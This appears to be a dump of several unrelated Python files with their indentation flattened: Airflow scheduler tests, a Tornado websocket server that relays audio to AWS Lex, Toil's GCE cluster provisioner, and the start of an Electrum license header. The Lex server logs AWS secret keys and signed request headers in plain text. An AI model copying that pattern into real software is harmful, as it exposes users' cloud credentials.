self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
server.py | #!/usr/bin/env python
from __future__ import absolute_import, print_function
import argparse
import ConfigParser as configparser
import io
import logging
import os
import sys
import time
from ConfigParser import SafeConfigParser as ConfigParser
from logging import debug, info
import uuid
import requests
import tornado.ioloop
import tornado.websocket
import tornado.httpserver
import tornado.template
import tornado.web
import webrtcvad
from requests_aws4auth import AWS4Auth
from tornado.web import url
import json
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
from requests.packages.urllib3.exceptions import SNIMissingWarning
#Only used for record function
import datetime
import wave
import threading
logging.captureWarnings(True)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)
CLIP_MIN_MS = 100 # 100ms - the minimum audio clip that will be used
MAX_LENGTH = 10000 # Max length of a sound clip for processing in ms
SILENCE = 20 # How many continuous frames of silence determine the end of a phrase
# Constants:
BYTES_PER_FRAME = 640 # Bytes in a frame
MS_PER_FRAME = 20 # Duration of a frame in ms
CLIP_MIN_FRAMES = CLIP_MIN_MS // MS_PER_FRAME
# Global variables
conns = {}
DEFAULT_CONFIG = """
[lexmo]
"""
class BufferedPipe(object):
def __init__(self, max_frames, sink):
"""
Create a buffer which will call the provided `sink` when full.
It will call `sink` with the number of frames and the accumulated bytes when it reaches
`max_buffer_size` frames.
"""
self.sink = sink
self.max_frames = max_frames
self.count = 0
self.payload = b''
self.is_processing = False
def append(self, data, id):
""" Add another data to the buffer. `data` should be a `bytes` object. """
if self.is_processing:
return
self.count += 1
self.payload += data
if self.count == self.max_frames:
self.process(id)
def process(self, id):
""" Process and clear the buffer. """
if self.is_processing:
return
self.is_processing = True
thread = threading.Thread(target=self.process_thread(id))
thread.daemon = True
thread.start()
def process_thread(self, id):
def process_thread_inner():
self.sink(self.count, self.payload, id)
self.count = 0
self.payload = b''
self.is_processing = False
return process_thread_inner
class LexProcessor(object):
def __init__(self, path, aws_id, aws_secret):
self._aws_region = 'us-east-1'
self._aws_id = aws_id
self._aws_secret = aws_secret
self._path = path
def process(self, count, payload, id):
if count > CLIP_MIN_FRAMES: # If the buffer is less than CLIP_MIN_MS, ignore it
if logging.getLogger().level == 10: #if we're in Debug then save the audio clip
fn = "{}rec-{}-{}.wav".format('./recordings/', id, datetime.datetime.now().strftime("%Y%m%dT%H%M%S"))
output = wave.open(fn, 'wb')
output.setparams((1, 2, 16000, 0, 'NONE', 'not compressed'))
output.writeframes(payload)
output.close()
debug('File written {}'.format(fn))
auth = AWS4Auth(self._aws_id, self._aws_secret, 'us-east-1', 'lex', unsign_payload=True)
info('Processing {} frames for {}'.format(str(count), id))
endpoint = 'https://runtime.lex.{}.amazonaws.com{}'.format(self._aws_region, self._path)
headers = {'Content-Type': 'audio/l16; channels=1; rate=16000', 'Accept': 'audio/pcm'}
req = requests.Request('POST', endpoint, auth=auth, headers=headers)
prepped = req.prepare()
info(prepped.headers)
r = requests.post(endpoint, data=payload, headers=prepped.headers)
info(r.headers)
self.playback(r.content, id)
else:
info('Discarding {} frames'.format(str(count)))
def playback(self, content, id):
frames = len(content) // 640
info("Playing {} frames to {}".format(frames, id))
conn = conns[id]
pos = 0
for x in range(0, frames + 1):
newpos = pos + 640
#debug("writing bytes {} to {} to socket for {}".format(pos, newpos, id))
data = content[pos:newpos]
conn.write_message(data, binary=True)
time.sleep(0.018)
pos = newpos
time.sleep(0.5)
class WSHandler(tornado.websocket.WebSocketHandler):
def initialize(self):
# Create a buffer which will call `process` when it is full:
self.frame_buffer = None
# Setup the Voice Activity Detector
self.tick = None
self.id = uuid.uuid4().hex
self.vad = webrtcvad.Vad()
self.vad.set_mode(2) # Level of sensitivity
self.processor = None
self.path = None
conns[self.id] = self
def open(self, path):
info("client connected")
debug(self.request.uri)
self.path = self.request.uri
self.tick = 0
self.set_nodelay(True)
def on_message(self, message):
# Check if message is Binary or Text
if type(message) == str:
if self.vad.is_speech(message, 16000):
debug ("SPEECH from {}".format(self.id))
self.tick = SILENCE
self.frame_buffer.append(message, self.id)
else:
debug("Silence from {} TICK: {}".format(self.id, self.tick))
self.tick -= 1
if self.tick == 0:
self.frame_buffer.process(self.id) # Force processing and clearing of the buffer
else:
info(message)
# Here we should be extracting the meta data that was sent and attaching it to the connection object
data = json.loads(message)
self.processor = LexProcessor(self.path, data['aws_key'], data['aws_secret']).process
self.frame_buffer = BufferedPipe(MAX_LENGTH // MS_PER_FRAME, self.processor)
self.write_message('ok')
def on_close(self):
# Remove the connection from the list of connections
del conns[self.id]
info("client disconnected")
class PingHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self):
self.write('ok')
self.set_header("Content-Type", 'text/plain')
self.finish()
class Config(object):
def __init__(self, specified_config_path):
config = ConfigParser()
config.readfp(io.BytesIO(DEFAULT_CONFIG))
config.read("./lexmo.conf")
# Validate config:
try:
self.host = os.getenv('HOST') or config.get("lexmo", "host")
self.port = os.getenv('PORT') or config.getint("lexmo", "port")
except configparser.Error as e:
print("Configuration Error:", e, file=sys.stderr)
sys.exit(1)
def main(argv=sys.argv[1:]):
try:
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--verbose", action="count")
ap.add_argument("-c", "--config", default=None)
args = ap.parse_args(argv)
logging.basicConfig(
level=logging.INFO if args.verbose < 1 else logging.DEBUG,
format="%(levelname)7s %(message)s",
)
config = Config(args.config)
application = tornado.web.Application([
url(r"/ping", PingHandler),
url(r"/(.*)", WSHandler),
])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(config.port)
info("Running on port %s", config.port)
tornado.ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
pass # Suppress the stack-trace on quit
if __name__ == "__main__":
main()
|
gceProvisioner.py | # Copyright (C) 2015 UCSC Computational Genomics Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import range
import os
import time
import threading
import json
import requests
import uuid
import logging
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.compute.drivers.gce import GCEFailedNode
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners import NoSuchClusterException
from toil.jobStores.googleJobStore import GoogleJobStore
from toil.provisioners.node import Node
logger = logging.getLogger(__name__)
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
class GCEProvisioner(AbstractProvisioner):
"""
Implements a Google Compute Engine Provisioner using libcloud.
"""
NODE_BOTO_PATH = "/root/.boto" # boto file path on instances
SOURCE_IMAGE = (b'projects/flatcar-cloud/global/images/family/flatcar-stable')
def __init__(self, clusterName, zone, nodeStorage, nodeStorageOverrides, sseKey):
super(GCEProvisioner, self).__init__(clusterName, zone, nodeStorage, nodeStorageOverrides)
self.cloud = 'gce'
self._sseKey = sseKey
# If the clusterName is not given, then Toil must be running on the leader
# and should read the settings from the instance meta-data.
if clusterName:
self._readCredentials()
else:
self._readClusterSettings()
def _readClusterSettings(self):
"""
Read the cluster settings from the instance, which should be the leader.
See https://cloud.google.com/compute/docs/storing-retrieving-metadata for details about
reading the metadata.
"""
metadata_server = "http://metadata/computeMetadata/v1/instance/"
metadata_flavor = {'Metadata-Flavor': 'Google'}
zone = requests.get(metadata_server + 'zone', headers = metadata_flavor).text
self._zone = zone.split('/')[-1]
project_metadata_server = "http://metadata/computeMetadata/v1/project/"
self._projectId = requests.get(project_metadata_server + 'project-id', headers = metadata_flavor).text
# From a GCE instance, these values can be blank. Only the projectId is needed
self._googleJson = ''
self._clientEmail = ''
self._tags = requests.get(metadata_server + 'description', headers = metadata_flavor).text
tags = json.loads(self._tags)
self.clusterName = tags['clusterName']
self._gceDriver = self._getDriver()
self._instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
leader = self.getLeader()
self._leaderPrivateIP = leader.privateIP
# generate a public key for the leader, which is used to talk to workers
self._masterPublicKey = self._setSSH()
# The location of the Google credentials file on instances.
self._credentialsPath = GoogleJobStore.nodeServiceAccountJson
self._keyName = 'core' # key name leader users to communicate with works
self._botoPath = self.NODE_BOTO_PATH # boto credentials (used if reading an AWS bucket)
def _readCredentials(self):
"""
Get the credentials from the file specified by GOOGLE_APPLICATION_CREDENTIALS.
"""
self._googleJson = os.getenv('GOOGLE_APPLICATION_CREDENTIALS')
if not self._googleJson:
raise RuntimeError('GOOGLE_APPLICATION_CREDENTIALS not set.')
try:
with open(self._googleJson) as jsonFile:
self.googleConnectionParams = json.loads(jsonFile.read())
except:
raise RuntimeError('GCEProvisioner: Could not parse the Google service account json file %s'
% self._googleJson)
self._projectId = self.googleConnectionParams['project_id']
self._clientEmail = self.googleConnectionParams['client_email']
self._credentialsPath = self._googleJson
self._masterPublicKey = None
self._gceDriver = self._getDriver()
def launchCluster(self, leaderNodeType, leaderStorage, owner, **kwargs):
"""
In addition to the parameters inherited from the abstractProvisioner,
the Google launchCluster takes the following parameters:
keyName: The key used to communicate with instances
botoPath: Boto credentials for reading an AWS jobStore (optional).
vpcSubnet: A subnet (optional).
"""
if 'keyName' not in kwargs:
raise RuntimeError("A keyPairName is required for the GCE provisioner.")
self._keyName = kwargs['keyName']
if 'botoPath' in kwargs:
self._botoPath = kwargs['botoPath']
self._vpcSubnet = kwargs['vpcSubnet'] if 'vpcSubnet' in kwargs else None
# Throws an error if cluster exists
self._instanceGroup = self._gceDriver.ex_create_instancegroup(self.clusterName, self._zone)
logger.debug('Launching leader')
# GCE doesn't have a dictionary tags field. The tags field is just a string list.
# Therefore, dumping tags into the description.
tags = {'Owner': self._keyName, 'clusterName': self.clusterName}
if 'userTags' in kwargs:
tags.update(kwargs['userTags'])
self._tags = json.dumps(tags)
userData = self._getCloudConfigUserData('leader')
metadata = {'items': [{'key': 'user-data', 'value': userData}]}
imageType = 'flatcar-stable'
sa_scopes = [{'scopes': ['compute', 'storage-full']}]
disk = {}
disk['initializeParams'] = {
'sourceImage': self.SOURCE_IMAGE,
'diskSizeGb' : leaderStorage }
disk.update({'boot': True,
'autoDelete': True })
name= 'l' + str(uuid.uuid4())
leader = self._gceDriver.create_node(name, leaderNodeType, imageType,
location=self._zone,
ex_service_accounts=sa_scopes,
ex_metadata=metadata,
ex_subnetwork=self._vpcSubnet,
ex_disks_gce_struct = [disk],
description=self._tags,
ex_preemptible=False)
self._instanceGroup.add_instances([leader])
self._leaderPrivateIP = leader.private_ips[0] # needed if adding workers
#self.subnetID = leader.subnet_id #TODO: get subnetID
# Wait for the appliance to start and inject credentials.
leaderNode = Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
preemptable=False, tags=self._tags)
leaderNode.waitForNode('toil_leader', keyName=self._keyName)
leaderNode.copySshKeys(self._keyName)
leaderNode.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_leader')
if self._botoPath:
leaderNode.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_leader')
logger.debug('Launched leader')
def getNodeShape(self, nodeType, preemptable=False):
# TODO: read this value only once
sizes = self._gceDriver.list_sizes(location=self._zone)
sizes = [x for x in sizes if x.name == nodeType]
assert len(sizes) == 1
instanceType = sizes[0]
disk = 0 #instanceType.disks * instanceType.disk_capacity * 2 ** 30
if disk == 0:
# This is an EBS-backed instance. We will use the root
# volume, so add the amount of EBS storage requested forhe root volume
disk = self._nodeStorageOverrides.get(nodeType, self._nodeStorage) * 2 ** 30
# Ram is in M.
#Underestimate memory by 100M to prevent autoscaler from disagreeing with
#mesos about whether a job can run on a particular node type
memory = (instanceType.ram/1000 - 0.1) * 2** 30
return Shape(wallTime=60 * 60,
memory=memory,
cores=instanceType.extra['guestCpus'],
disk=disk,
preemptable=preemptable)
@staticmethod
def retryPredicate(e):
""" Not used by GCE """
return False
def destroyCluster(self):
"""
Try a few times to terminate all of the instances in the group.
"""
logger.debug("Destroying cluster %s" % self.clusterName)
instancesToTerminate = self._getNodesInCluster()
attempts = 0
while instancesToTerminate and attempts < 3:
self._terminateInstances(instances=instancesToTerminate)
instancesToTerminate = self._getNodesInCluster()
attempts += 1
# remove group
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instanceGroup.destroy()
def terminateNodes(self, nodes):
nodeNames = [n.name for n in nodes]
instances = self._getNodesInCluster()
instancesToKill = [i for i in instances if i.name in nodeNames]
self._terminateInstances(instancesToKill)
def addNodes(self, nodeType, numNodes, preemptable, spotBid=None):
assert self._leaderPrivateIP
# If keys are rsynced, then the mesos-slave needs to be started after the keys have been
# transferred. The waitForKey.sh script loops on the new VM until it finds the keyPath file, then it starts the
# mesos-slave. If there are multiple keys to be transferred, then the last one to be transferred must be
# set to keyPath.
keyPath = None
botoExists = False
if self._botoPath is not None and os.path.exists(self._botoPath):
keyPath = self.NODE_BOTO_PATH
botoExists = True
elif self._sseKey:
keyPath = self._sseKey
if not preemptable:
logger.debug('Launching %s non-preemptable nodes', numNodes)
else:
logger.debug('Launching %s preemptable nodes', numNodes)
#kwargs["subnet_id"] = self.subnetID if self.subnetID else self._getClusterInstance(self.instanceMetaData).subnet_id
userData = self._getCloudConfigUserData('worker', self._masterPublicKey, keyPath, preemptable)
metadata = {'items': [{'key': 'user-data', 'value': userData}]}
imageType = 'flatcar-stable'
sa_scopes = [{'scopes': ['compute', 'storage-full']}]
disk = {}
disk['initializeParams'] = {
'sourceImage': self.SOURCE_IMAGE,
'diskSizeGb' : self._nodeStorageOverrides.get(nodeType, self._nodeStorage) }
disk.update({'boot': True,
'autoDelete': True })
# TODO:
# - bug in gce.py for ex_create_multiple_nodes (erroneously, doesn't allow image and disk to specified)
# - ex_create_multiple_nodes is limited to 1000 nodes
# - use a different function
# - or write a loop over the rest of this function, with 1K nodes max on each iteration
#instancesLaunched = driver.ex_create_multiple_nodes(
retries = 0
workersCreated = 0
# Try a few times to create the requested number of workers
while numNodes-workersCreated > 0 and retries < 3:
instancesLaunched = self.ex_create_multiple_nodes(
'', nodeType, imageType, numNodes-workersCreated,
location=self._zone,
ex_service_accounts=sa_scopes,
ex_metadata=metadata,
ex_disks_gce_struct = [disk],
description=self._tags,
ex_preemptible = preemptable
)
failedWorkers = []
for instance in instancesLaunched:
if isinstance(instance, GCEFailedNode):
logger.error("Worker failed to launch with code %s. Error message: %s"
% (instance.code, instance.error))
continue
node = Node(publicIP=instance.public_ips[0], privateIP=instance.private_ips[0],
name=instance.name, launchTime=instance.created_at, nodeType=instance.size,
preemptable=False, tags=self._tags) #FIXME: what should tags be set to?
try:
self._injectWorkerFiles(node, botoExists)
logger.debug("Created worker %s" % node.publicIP)
self._instanceGroup.add_instances([instance])
workersCreated += 1
except Exception as e:
logger.error("Failed to configure worker %s. Error message: %s" % (node.name, e))
failedWorkers.append(instance)
if failedWorkers:
logger.error("Terminating %d failed workers" % len(failedWorkers))
self._terminateInstances(failedWorkers)
retries += 1
logger.debug('Launched %d new instance(s)', numNodes)
if numNodes != workersCreated:
logger.error("Failed to launch %d worker(s)", numNodes-workersCreated)
return workersCreated
def getProvisionedWorkers(self, nodeType, preemptable):
assert self._leaderPrivateIP
entireCluster = self._getNodesInCluster(nodeType=nodeType)
logger.debug('All nodes in cluster: %s', entireCluster)
workerInstances = []
for instance in entireCluster:
scheduling = instance.extra.get('scheduling')
# If this field is not found in the extra meta-data, assume the node is not preemptable.
if scheduling and scheduling.get('preemptible', False) != preemptable:
continue
isWorker = True
for ip in instance.private_ips:
if ip == self._leaderPrivateIP:
isWorker = False
break # don't include the leader
if isWorker and instance.state == 'running':
workerInstances.append(instance)
logger.debug('All workers found in cluster: %s', workerInstances)
return [Node(publicIP=i.public_ips[0], privateIP=i.private_ips[0],
name=i.name, launchTime=i.created_at, nodeType=i.size,
preemptable=preemptable, tags=None)
for i in workerInstances]
def getLeader(self):
instances = self._getNodesInCluster()
instances.sort(key=lambda x: x.created_at)
try:
leader = instances[0] # assume leader was launched first
except IndexError:
raise NoSuchClusterException(self.clusterName)
return Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
preemptable=False, tags=None)
def _injectWorkerFiles(self, node, botoExists):
"""
Set up the credentials on the worker.
"""
node.waitForNode('toil_worker', keyName=self._keyName)
node.copySshKeys(self._keyName)
node.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_worker')
if self._sseKey:
node.injectFile(self._sseKey, self._sseKey, 'toil_worker')
if botoExists:
node.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_worker')
def _getNodesInCluster(self, nodeType=None):
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instances = instanceGroup.list_instances()
if nodeType:
instances = [instance for instance in instances if instance.size == nodeType]
return instances
def _getDriver(self):
""" Connect to GCE """
driverCls = get_driver(Provider.GCE)
return driverCls(self._clientEmail,
self._googleJson,
project=self._projectId,
datacenter=self._zone)
def _terminateInstances(self, instances):
def worker(driver, instance):
logger.debug('Terminating instance: %s', instance.name)
driver.destroy_node(instance)
threads = []
for instance in instances:
t = threading.Thread(target=worker, args=(self._gceDriver,instance))
threads.append(t)
t.start()
logger.debug('... Waiting for instance(s) to shut down...')
for t in threads:
t.join()
# MONKEY PATCH - This function was copied form libcloud to fix a bug.
DEFAULT_TASK_COMPLETION_TIMEOUT = 180
def ex_create_multiple_nodes(
self, base_name, size, image, number, location=None,
ex_network='default', ex_subnetwork=None, ex_tags=None,
ex_metadata=None, ignore_errors=True, use_existing_disk=True,
poll_interval=2, external_ip='ephemeral',
ex_disk_type='pd-standard', ex_disk_auto_delete=True,
ex_service_accounts=None, timeout=DEFAULT_TASK_COMPLETION_TIMEOUT,
description=None, ex_can_ip_forward=None, ex_disks_gce_struct=None,
ex_nic_gce_struct=None, ex_on_host_maintenance=None,
ex_automatic_restart=None, ex_image_family=None,
ex_preemptible=None):
"""
Monkey patch to gce.py in libcloud to allow disk and images to be specified.
Also changed name to a uuid below.
The prefix 'wp' identifies preemptable nodes and 'wn' non-preemptable nodes.
"""
# if image and ex_disks_gce_struct:
# raise ValueError("Cannot specify both 'image' and "
# "'ex_disks_gce_struct'.")
driver = self._getDriver()
if image and ex_image_family:
raise ValueError("Cannot specify both 'image' and "
"'ex_image_family'")
location = location or driver.zone
if not hasattr(location, 'name'):
location = driver.ex_get_zone(location)
if not hasattr(size, 'name'):
size = driver.ex_get_size(size, location)
if not hasattr(ex_network, 'name'):
ex_network = driver.ex_get_network(ex_network)
if ex_subnetwork and not hasattr(ex_subnetwork, 'name'):
ex_subnetwork = \
driver.ex_get_subnetwork(ex_subnetwork,
region=driver._get_region_from_zone(
location))
if ex_image_family:
image = driver.ex_get_image_from_family(ex_image_family)
if image and not hasattr(image, 'name'):
image = driver.ex_get_image(image)
if not hasattr(ex_disk_type, 'name'):
ex_disk_type = driver.ex_get_disktype(ex_disk_type, zone=location)
node_attrs = {'size': size,
'image': image,
'location': location,
'network': ex_network,
'subnetwork': ex_subnetwork,
'tags': ex_tags,
'metadata': ex_metadata,
'ignore_errors': ignore_errors,
'use_existing_disk': use_existing_disk,
'external_ip': external_ip,
'ex_disk_type': ex_disk_type,
'ex_disk_auto_delete': ex_disk_auto_delete,
'ex_service_accounts': ex_service_accounts,
'description': description,
'ex_can_ip_forward': ex_can_ip_forward,
'ex_disks_gce_struct': ex_disks_gce_struct,
'ex_nic_gce_struct': ex_nic_gce_struct,
'ex_on_host_maintenance': ex_on_host_maintenance,
'ex_automatic_restart': ex_automatic_restart,
'ex_preemptible': ex_preemptible}
# List for holding the status information for disk/node creation.
status_list = []
for i in range(number):
name = 'wp' if ex_preemptible else 'wn'
name += str(uuid.uuid4()) #'%s-%03d' % (base_name, i)
status = {'name': name, 'node_response': None, 'node': None}
status_list.append(status)
start_time = time.time()
complete = False
while not complete:
if (time.time() - start_time >= timeout):
raise Exception("Timeout (%s sec) while waiting for multiple "
"instances")
complete = True
time.sleep(poll_interval)
for status in status_list:
# Create the node or check status if already in progress.
if not status['node']:
if not status['node_response']:
driver._multi_create_node(status, node_attrs)
else:
driver._multi_check_node(status, node_attrs)
# If any of the nodes have not been created (or failed) we are
# not done yet.
if not status['node']:
complete = False
# Return list of nodes
node_list = []
for status in status_list:
node_list.append(status['node'])
return node_list
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
